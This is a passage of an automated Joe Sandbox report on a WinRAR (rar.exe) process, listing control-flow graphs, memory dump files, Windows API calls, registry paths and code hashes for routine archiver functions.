1506->1523 1511->1498 1512->1498 1516->1498 1561 7ff74ee853db-7ff74ee853ea call 7ff74eeaba9c 1516->1561 1517->1518 1519->1512 1520->1424 1537 7ff74ee8525d-7ff74ee85260 1523->1537 1538 7ff74ee8526b-7ff74ee85272 1523->1538 1527->1498 1528->1543 1537->1504 1550 7ff74ee85266 1537->1550 1538->1492 1557 7ff74ee85367 1543->1557 1545->1440 1546->1494 1550->1519 1557->1498 1561->1498
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction ID: d23928c608e05f6f1266101330b824c8ca39fd972b43dc50c364882908fa0066
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC18321E1CAE2C4FB24BF2588511FCA291BF467A4FC45135E94E4B6DADEACE509C330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1564 7ff74eeb7f24-7ff74eeb7f5c 1565 7ff74eeb7fd0 1564->1565 1566 7ff74eeb7f5e-7ff74eeb7f64 1564->1566 1568 7ff74eeb7fd7-7ff74eeb7fea 1565->1568 1566->1565 1567 7ff74eeb7f66-7ff74eeb7f7c call 7ff74eebb3f0 1566->1567 1578 7ff74eeb7fb5 1567->1578 1579 7ff74eeb7f7e-7ff74eeb7fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1570 7ff74eeb8036-7ff74eeb8039 1568->1570 1571 7ff74eeb7fec-7ff74eeb7fef 1568->1571 1573 7ff74eeb803b-7ff74eeb804a 1570->1573 1574 7ff74eeb805c-7ff74eeb8065 GetCurrentProcessId 1570->1574 1571->1574 1575 7ff74eeb7ff1-7ff74eeb8000 1571->1575 1584 7ff74eeb804f-7ff74eeb8051 1573->1584 1576 7ff74eeb8077-7ff74eeb8093 1574->1576 1577 7ff74eeb8067 1574->1577 1585 7ff74eeb8005-7ff74eeb8007 1575->1585 1580 7ff74eeb8069-7ff74eeb8075 1577->1580 1581 7ff74eeb7fbc-7ff74eeb7fce 1578->1581 1579->1581 1580->1576 1580->1580 1581->1568 1584->1576 1587 7ff74eeb8053-7ff74eeb805a 1584->1587 1585->1576 1586 7ff74eeb8009 1585->1586 1588 7ff74eeb8010-7ff74eeb8034 call 7ff74ee8ca6c call 7ff74ee8cda4 call 7ff74ee8ca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction ID: 2f5a374305c8abc9711a009e4d2051d54fe4bc7334ac281fec4f434f727c74b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC415921A0CAA7C4FA44FB56A840579E7A0BF49BF4F880271CD9D07B95DEBCE4468324

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction ID: 7ac5936053e459fe4a44876dbb48c1ea97f031dbaf22bc59a2f3e59d6e1b895d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC317C21E0C663C1FA14BB64A4117B9E391BF457A4FC40834EA5E4B2D3DFACE8848271

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB47DB
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4831
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4853
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB48A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                              • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction ID: 00e19076188a9f5f7b7e7cd0263c3ac1b8e976ef20dbfb40c6cca85c66d9094a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631822261CA91C5FA50FB65E8102BAB351FF847A4F804231EE8D47B99EFACD144C710

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA43D1
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA4402
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA440D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA443E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                              • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                              • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction ID: ad30b453d5120a34fcb05d7e393039fe6ed027af02c787e5f852d2ac8f480fcb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72115E22A1C752C6FA11BF66E4005A9B361FF85BA4F845135EA4E07A59DFBCD504C710

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1715 7ff74ee77a5b-7ff74ee77a5e 1716 7ff74ee77a68 1715->1716 1717 7ff74ee77a60-7ff74ee77a66 1715->1717 1718 7ff74ee77a6b-7ff74ee77a7c 1716->1718 1717->1716 1717->1718 1719 7ff74ee77a7e-7ff74ee77a81 1718->1719 1720 7ff74ee77aa8 1718->1720 1722 7ff74ee77a88-7ff74ee77a8b 1719->1722 1723 7ff74ee77a83-7ff74ee77a86 1719->1723 1721 7ff74ee77aab-7ff74ee77ab8 1720->1721 1724 7ff74ee77aba-7ff74ee77abd 1721->1724 1725 7ff74ee77ac8-7ff74ee77acb 1721->1725 1726 7ff74ee77a8d-7ff74ee77a90 1722->1726 1727 7ff74ee77aa4-7ff74ee77aa6 1722->1727 1723->1720 1723->1722 1724->1725 1728 7ff74ee77abf-7ff74ee77ac6 1724->1728 1729 7ff74ee77acf-7ff74ee77ad1 1725->1729 1726->1720 1730 7ff74ee77a92-7ff74ee77a99 1726->1730 1727->1721 1728->1729 1731 7ff74ee77b2a-7ff74ee77bb0 call 7ff74ee91d34 call 7ff74ee73f04 1729->1731 1732 7ff74ee77ad3-7ff74ee77ae6 1729->1732 1730->1727 1733 7ff74ee77a9b-7ff74ee77aa2 1730->1733 1744 7ff74ee77bbc 1731->1744 1745 7ff74ee77bb2-7ff74ee77bba 1731->1745 1734 7ff74ee77b0a-7ff74ee77b27 1732->1734 1735 7ff74ee77ae8-7ff74ee77af2 call 7ff74ee89be0 1732->1735 1733->1720 1733->1727 1734->1731 1739 7ff74ee77af7-7ff74ee77b02 1735->1739 1739->1734 1746 7ff74ee77bbf-7ff74ee77bc9 1744->1746 1745->1744 1745->1746 1747 7ff74ee77bcb-7ff74ee77bd5 call 7ff74ee91e1c 1746->1747 1748 7ff74ee77bda-7ff74ee77c06 call 7ff74ee7b540 1746->1748 1747->1748 1752 7ff74ee77c08-7ff74ee77c0f 1748->1752 1753 7ff74ee77c40 1748->1753 1752->1753 1755 7ff74ee77c11-7ff74ee77c14 1752->1755 1754 7ff74ee77c44-7ff74ee77c5a call 7ff74ee7aa68 1753->1754 1760 7ff74ee77c5c-7ff74ee77c6a 1754->1760 1761 7ff74ee77c85-7ff74ee77c97 call 7ff74ee7b540 1754->1761 1755->1753 1757 7ff74ee77c16-7ff74ee77c2b 1755->1757 1757->1754 1759 7ff74ee77c2d-7ff74ee77c3e call 7ff74eec9b98 1757->1759 1759->1754 1760->1761 1763 7ff74ee77c6c-7ff74ee77c7e call 7ff74ee78d98 1760->1763 1767 7ff74ee77c9c-7ff74ee77c9f 1761->1767 1763->1761 1769 7ff74ee77ca5-7ff74ee77cfb call 7ff74eea9354 call 7ff74ee96378 * 2 1767->1769 1770 7ff74ee77fa4-7ff74ee77fbe 1767->1770 1777 7ff74ee77cfd-7ff74ee77d10 call 7ff74ee75414 1769->1777 1778 7ff74ee77d17-7ff74ee77d1f 1769->1778 1777->1778 1780 7ff74ee77d25-7ff74ee77d28 1778->1780 1781 7ff74ee77de2-7ff74ee77de6 1778->1781 1780->1781 1785 7ff74ee77d2e-7ff74ee77d36 1780->1785 1783 7ff74ee77e4e-7ff74ee77e68 call 7ff74eea9958 1781->1783 1784 7ff74ee77de8-7ff74ee77e49 call 7ff74eea98dc 1781->1784 1794 7ff74ee77e8b-7ff74ee77e8e 1783->1794 1795 7ff74ee77e6a-7ff74ee77e84 1783->1795 1784->1783 1788 7ff74ee77d59-7ff74ee77d6a call 7ff74eeca444 1785->1788 1789 7ff74ee77d38-7ff74ee77d49 call 7ff74eeca444 1785->1789 1797 7ff74ee77d6c-7ff74ee77d77 call 7ff74ee9cf8c 1788->1797 1798 7ff74ee77d78-7ff74ee77dc6 1788->1798 1801 7ff74ee77d4b-7ff74ee77d56 call 7ff74ee98ae8 1789->1801 1802 7ff74ee77d57 1789->1802 1799 7ff74ee77e9f-7ff74ee77eb8 call 7ff74ee71204 1794->1799 1800 7ff74ee77e90-7ff74ee77e9a call 7ff74eea9990 1794->1800 1795->1794 1797->1798 1798->1781 1823 7ff74ee77dc8-7ff74ee77de1 call 7ff74ee71314 call 7ff74eecba34 1798->1823 1812 7ff74ee77ec8-7ff74ee77ed9 call 7ff74eea941c 1799->1812 1800->1799 1801->1802 1802->1798 1817 7ff74ee77edb-7ff74ee77f9f call 7ff74ee71400 call 7ff74ee96424 call 7ff74ee7b540 1812->1817 1818 7ff74ee77eba-7ff74ee77ec3 call 7ff74eea9680 1812->1818 1817->1770 1818->1812 1823->1781
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: H9
                                                                                                                                                                                                                              • API String ID: 0-2207570329
                                                                                                                                                                                                                              • Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                                                                              • Instruction ID: a1824f836b833cabe67a6fce719d0557a1e5d0c13ed09423cdb6f0af8a8237c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4E18962A0CAA2C5FB10FB24E048AAD67A9FF4979CF864535DE4D07785DF78A544C320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1858 7ff74ee92574-7ff74ee9259c 1859 7ff74ee925a5-7ff74ee925a9 1858->1859 1860 7ff74ee9259e-7ff74ee925a0 1858->1860 1861 7ff74ee925ba-7ff74ee925c6 1859->1861 1862 7ff74ee925ab-7ff74ee925b6 GetStdHandle 1859->1862 1863 7ff74ee9273a-7ff74ee92756 1860->1863 1864 7ff74ee925c8-7ff74ee925cd 1861->1864 1865 7ff74ee92619-7ff74ee92637 WriteFile 1861->1865 1862->1861 1866 7ff74ee925cf-7ff74ee92609 WriteFile 1864->1866 1867 7ff74ee92644-7ff74ee92648 1864->1867 1868 7ff74ee9263b-7ff74ee9263e 1865->1868 1866->1867 1869 7ff74ee9260b-7ff74ee92615 1866->1869 1870 7ff74ee92733-7ff74ee92737 1867->1870 1871 7ff74ee9264e-7ff74ee92652 1867->1871 1868->1867 1868->1870 1869->1866 1872 7ff74ee92617 1869->1872 1870->1863 1871->1870 1873 7ff74ee92658-7ff74ee92692 GetLastError call 7ff74ee93144 SetLastError 1871->1873 1872->1868 1878 7ff74ee92694-7ff74ee926a2 1873->1878 1879 7ff74ee926bc-7ff74ee926d0 call 7ff74ee8c95c 1873->1879 1878->1879 1880 7ff74ee926a4-7ff74ee926ab 1878->1880 1885 7ff74ee92721-7ff74ee9272e call 7ff74ee8cf14 1879->1885 1886 7ff74ee926d2-7ff74ee926db 1879->1886 1880->1879 1882 7ff74ee926ad-7ff74ee926b7 call 7ff74ee8cf34 1880->1882 1882->1879 1885->1870 1886->1861 1888 7ff74ee926e1-7ff74ee926e3 1886->1888 1888->1861 1889 7ff74ee926e9-7ff74ee9271c 1888->1889 1889->1861
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3350704910-0
                                                                                                                                                                                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction ID: 1425492ae3d6f834ca4360e420f2f18f2aad0a7abc0fd1d715c498f1e3ce80de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351732660CA61C6FF64FB25F41437AB3A0FB49B64F840135DA4E46A91DFBCE545C620

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
